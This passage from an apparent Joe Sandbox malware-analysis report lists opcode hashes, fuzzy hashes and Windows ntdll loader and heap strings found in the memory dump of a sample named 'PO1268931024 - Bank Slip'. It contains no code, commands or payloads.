                                                                                                        • Instruction Fuzzy Hash: 3341E273A042558FCB22DF1DD840A26BBECAF49B54F090A6DED49D7319E730DA00CB81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        • Opcode ID: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                                        • Instruction ID: 1a3bc0e3b04cefb6ea62c282362529b482891bf47b4341d6edeb8caec9a55064
                                                                                                        • Opcode Fuzzy Hash: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                                        • Instruction Fuzzy Hash: 8311DC31359102DFDB29DA18C854B7AF3A4EF80A16F1886ADF906CB255DB34E840C755
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                                                                                        • LdrpInitializationFailure, xrefs: 018120FA
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        • Opcode ID: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                                        • Instruction ID: c214b9b2c1799054da273496ef929458a08e6d6758b2cea98c1c0795e6bf5441
                                                                                                        • Opcode Fuzzy Hash: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                                        • Instruction Fuzzy Hash: 6DF02875640308ABEB20E60CCC56F99B76CFB40B04F200068FA00B7285D1B0EB40CA41
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        • Opcode ID: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                                        • Instruction ID: 09efe670fbb5b4bce81f99dc862a7db26621d30a0b97fa7a99b3c47cc4c6c0db
                                                                                                        • Opcode Fuzzy Hash: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                                        • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA8C994FAEB7F8BF48704F144169EA05E7255EA34EE41CBA1
                                                                                                        Strings
                                                                                                        • LdrResSearchResource Enter, xrefs: 0179AA13
                                                                                                        • LdrResSearchResource Exit, xrefs: 0179AA25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        • Opcode ID: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                                        • Instruction ID: 7a0ca3351cd718a0b0ed2628251d6e6376d39863d6257fb14ca37096c6e30403
                                                                                                        • Opcode Fuzzy Hash: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                                        • Instruction Fuzzy Hash: 15E18F71A05219ABEF22CE9DD984BAEFBBAFF14314F10456AEA01E7241D738D944CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: 0f7d451e24f36911df043c659d93df19f144587567b65ea8cc9036e1ce32ada9
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: 12C1D1312043469BE768CE28C884B6BBBE5EFC4358F044A2DFA95C7291D775D605CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        • Opcode ID: 276e3f4bb99118ceb5abd200faa3211d8a74a7e8aa4894ccca89eb33d99faa7e
                                                                                                        • Instruction ID: b3922b293bd7796f9a00fae1dc24da71a70f29acede62e6470b9205829499f68
                                                                                                        • Opcode Fuzzy Hash: 276e3f4bb99118ceb5abd200faa3211d8a74a7e8aa4894ccca89eb33d99faa7e
                                                                                                        • Instruction Fuzzy Hash: E0615D71E0420D9FDB65DFA8CD40BAEBBB9FB48704F54486DE649EB291D731AA00CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        • Opcode ID: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                                        • Instruction ID: 6d66293c7e495cf328e8f40f368691a22f0c88d7732c10f0f6f4f27c28f730df
                                                                                                        • Opcode Fuzzy Hash: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                                        • Instruction Fuzzy Hash: F4512771E0021DAEDF11DFA9CC84AEEBBB9EB44754F140529E611F7291D7349A05CBA0
                                                                                                        Strings
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                                                                                        • kLsE, xrefs: 01790540
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        • Opcode ID: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                                                                                        • Instruction ID: 4bcdcca67a9335fc97ef39e64c92672c04f17d5dea846e22f42786d22a44b48c
                                                                                                        • Opcode Fuzzy Hash: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                                                                                        • Instruction Fuzzy Hash: 2651C3715247428FDB24DF68D5446A7FBE9AF84304F20483EFA9987241E770D549CF92
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                                        • Instruction ID: b9e813c488e399a3f9f31fe01941bdddf2bd5629a18f2bafcd73102a10cff162
                                                                                                        • Opcode Fuzzy Hash: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                                        • Instruction Fuzzy Hash: A341AD31A05649DBDB11CF59D840B6AFBB4FF84704F2440A9EE00DB396E6B5D944CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                                                                                        • Instruction ID: db789ca484bee845fe88cc1eed50094a3ffa285c3f5953efc22fad6003ac4ada
                                                                                                        • Opcode Fuzzy Hash: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                                                                                        • Instruction Fuzzy Hash: 1501D1B2250748AFD311DF14CD49B16B7E8EB84B1AF01893DA648D7190F334D904DB46
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        • Opcode ID: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                                                                                        • Instruction ID: cffe779060cad33ef8b83a14bcd37dc6a8e5eab38ca9c53cd1df0fd3ca884190
                                                                                                        • Opcode Fuzzy Hash: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                                                                                        • Instruction Fuzzy Hash: B2825A75E002198BEF25CFADE884BEDFBB5BF48310F1481A9D919AB351D7309989CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                                                                                        • Instruction ID: 8c7b343a678121bbdeadf6caf9144c03065a1c1cdd63194e9632cdf5d20365e9
                                                                                                        • Opcode Fuzzy Hash: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                                                                                        • Instruction Fuzzy Hash: 5E915172941219AFEB21DB99CD85FEEBBB8EF54750F200455F600EB199E774AA00CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                                                                                        • Instruction ID: 2bf0f45f3105299221c8653d3b85495fe73ba689fe07a5a1c7fa3dcf7b24f06f
                                                                                                        • Opcode Fuzzy Hash: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                                                                                        • Instruction Fuzzy Hash: DA918D31901609BFDB22AFA5DC88FAFBB79EF85744F180029F505E7251EB749A01CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        • Opcode ID: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                                                                                        • Instruction ID: 65d6f1f95800b5bf34deccbfe5afdfef89539f7c4c71030e67f9b387649c744d
                                                                                                        • Opcode Fuzzy Hash: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                                                                                        • Instruction Fuzzy Hash: 96715CB5E0021E8BDF69CF9CC9906ADBBB1BF48710F24812EE505E7285F7319A51CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        • Opcode ID: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                                                                                        • Instruction ID: 3d2a491c0810c093b08fc358e23ed3ed8301f6750efe60b008e9683c91fe3c82
                                                                                                        • Opcode Fuzzy Hash: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                                                                                        • Instruction Fuzzy Hash: D251B572D0022A9BDF14DF99D844AAEFBB5AF44B54F094129E911FB250D3749E01CBE4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        • Opcode ID: f4751aca32cf93651d5b2e20b7787ec4ee8d68046344057238d637b4cf061b24
                                                                                                        • Instruction ID: a82e2feac899d2f5eb9a399120032cdc9330dda3464cb8c0d6b8a2324e94d323
                                                                                                        • Opcode Fuzzy Hash: f4751aca32cf93651d5b2e20b7787ec4ee8d68046344057238d637b4cf061b24
                                                                                                        • Instruction Fuzzy Hash: BF418072508302ABD710DA75C984B6BFBE8AFC8714F840A2DFA84D7180EB74D944C792
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        • Opcode ID: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                                                                                        • Instruction ID: 138d49768027acdc468ab5486230832e62394595c2dd3a00607d54802bcfc913
                                                                                                        • Opcode Fuzzy Hash: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                                                                                        • Instruction Fuzzy Hash: 4C4163B1D0012DABDB61DE54CC84FDEB77CAB45714F0046E5AB08AB181DB709F898FA9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: 6394579979ca45408940280d259326e9d4d4b9c10d4da54a85853d63dfc28400
                                                                                                        • Instruction ID: d90860e9044557de93ff3448c1e6687f077f28804db26a99ebf16587b2615245
                                                                                                        • Opcode Fuzzy Hash: 6394579979ca45408940280d259326e9d4d4b9c10d4da54a85853d63dfc28400
                                                                                                        • Instruction Fuzzy Hash: 26314C31A003699BDB23EF68C844BEEBBB8DF44704F604028ED41EB282E775DA45CB50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryName
                                                                                                        • API String ID: 0-215506332
                                                                                                        • Opcode ID: 95b8333fd78aed66d04513c5ac77f2209a6b1698dc7e7b7e50f4f60f6fc4f05d
                                                                                                        • Instruction ID: b1e928ecbe9080606b1674a4c57a0d46a8acdf6023d0d3b300aa4880022a3a86
                                                                                                        • Opcode Fuzzy Hash: 95b8333fd78aed66d04513c5ac77f2209a6b1698dc7e7b7e50f4f60f6fc4f05d
                                                                                                        • Instruction Fuzzy Hash: C331F17690091DAFEB16DF58CC65E6FFB74EB80720F0142A9A901E7291D7309E00DBE0
                                                                                                        Strings
                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                        • API String ID: 0-702105204
                                                                                                        • Opcode ID: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                                        • Instruction ID: d2ffa2581a9c7cf945c2de7f69fe33c4a8bc903ff6b5f3d2f0be441228b6bed1
                                                                                                        • Opcode Fuzzy Hash: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                                        • Instruction Fuzzy Hash: B0012B337402059BE7206F5DDCC5A6ABF6EEF83764F04001CF641C6159CF206A84CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                                                                                        • Instruction ID: ad7b41d94a237d7510542b45558974296d8ef7c83e2f79b5e50ad659febde1da
                                                                                                        • Opcode Fuzzy Hash: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                                                                                        • Instruction Fuzzy Hash: 19429D316083419BE725CF68C890A6BBBE6BFC8704F0C492DFA96D7250D771DA45CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                                                                                        • Instruction ID: 52bd382112e84bc16b1905f6782d420ed26b7241e6945e1e89934d74c76920cc
                                                                                                        • Opcode Fuzzy Hash: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                                                                                        • Instruction Fuzzy Hash: 16424D75E002298FEF25CF69C885BADBBF5BF49300F148199E949EB242D7349A85CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                                                                                        • Instruction ID: 8635092439eec512f6dd50a01201842dc3d992986b7ed185200f6401b1b23195
                                                                                                        • Opcode Fuzzy Hash: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                                                                                        • Instruction Fuzzy Hash: B832BC70A007558BEB25CF69C8447BEFBF2BF84704F24411DE6869B385DB35A942CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                                        • Instruction ID: 1d4ba188e428942faa4dc0d004d249c014300e567f4039eaf916fa95556fd8db
                                                                                                        • Opcode Fuzzy Hash: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                                        • Instruction Fuzzy Hash: 7F22DE742046658BEB29CF2DC094376BBF1AF85304F0C845AE9C6CF286E775D642DBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                                        • Instruction ID: 1d0c2470e72c6f40f56efc047ec952b317c3a901d92a755a589dd1a22e9e9a05
                                                                                                        • Opcode Fuzzy Hash: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                                        • Instruction Fuzzy Hash: E9328C75A04205CFDF25CFA8D480AAAFBF1FF48310F6486A9EA55AB351D734E845CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction ID: eec81d71b443df8cc976f24c595ad2bca8d41bf519fc4ae858ee2b7a643bee2f
                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction Fuzzy Hash: 13F14071E0021A9BDB15CFA9C594BEEFBF5AF48710F088169EA06AB345E774D841CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f0091567235fa8f0f7178108df0b8dc6b67e9b27e2a53e2dba899214da06f99
                                                                                                        • Instruction ID: 82755d84aea7b6abdf90ac378d4b46a6560a30451c563630370f4e0f3bf2c159
                                                                                                        • Opcode Fuzzy Hash: 9f0091567235fa8f0f7178108df0b8dc6b67e9b27e2a53e2dba899214da06f99
                                                                                                        • Instruction Fuzzy Hash: 6DD1F171E0062A8FDF06CF68C841AFEB7F1AF89304F188169D956E7241D735EA45CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8bafa393d17eca918fd59bd5d0ce823bb0c60a1125d8849548239f85701c8409
                                                                                                        • Instruction ID: fb90f63206302b14db86afc4b0c3a8eb6440508f61d1d9b77394b33edbdc41cc
                                                                                                        • Opcode Fuzzy Hash: 8bafa393d17eca918fd59bd5d0ce823bb0c60a1125d8849548239f85701c8409
                                                                                                        • Instruction Fuzzy Hash: 97E17C71608342CFCB15CF28D494A6AFBE0BF89314F158A6DF99987351E731E909CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2529606552a7cf838c262568ed30e5abb1aa71dda7f21f921cde3cb943f6d728
                                                                                                        • Instruction ID: fe8eaec0c85d454ffbc45b40be903f0121f451f04df39098039ec5cd61f4ec7a
                                                                                                        • Opcode Fuzzy Hash: 2529606552a7cf838c262568ed30e5abb1aa71dda7f21f921cde3cb943f6d728
                                                                                                        • Instruction Fuzzy Hash: 30D10471A402069BDB14EFA8C884ABAFBF5FF58304F54466DE916DB280E734E950CB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction ID: fb61273688ef21ef6617c166b2609db439c5cb7a7333e2a975ee60e7f01e7248
                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction Fuzzy Hash: 68B1A376A00605AFDF25DF98C941EABBBBDFF86304F10441DAA02D7798DA74EA45CB10
                                                                                                        Memory Dump Source
